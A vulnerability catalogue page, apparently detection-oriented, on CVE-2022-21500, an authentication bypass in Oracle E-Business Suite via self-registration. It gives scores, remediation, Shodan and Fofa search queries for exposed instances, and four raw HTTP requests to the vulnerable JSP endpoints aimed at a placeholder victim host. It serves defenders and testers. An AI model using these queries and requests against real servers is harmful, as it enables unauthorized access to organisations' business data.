🔙 목록으로 돌아가기

CVE-2022-21500: Oracle E-Business Suite <=12.2 - Authentication Bypass

TitleOracle E-Business Suite <=12.2 - Authentication Bypass
Author3th1c_yuk1,tess,0xpugal
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application.
RemediationApply the necessary security patches or updates provided by Oracle to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.93773
CVE IDCVE-2022-21500
Shodan Queryhttp.title:"Login" "X-ORACLE-DMS-ECID" 200http.title:"login" "x-oracle-dms-ecid" 200
Fofa Querytitle="login" "x-oracle-dms-ecid" 200
Tags cve cve2022 oracle misconfig auth-bypass vkev vuln

🔍 Vulnerability Description

Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.

🌐 HTTP Request

GET /OA_HTML/ibeCAcpSSOReg.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Moz111a/5.0 (1Pad; CPU 0S 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /OA_HTML/ibeCRgpPrimaryCreate.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /OA_HTML/ibeCRgpIndividualUser.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /OA_HTML/ibeCRgpPartnerPriCreate.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-21500.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-21500.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A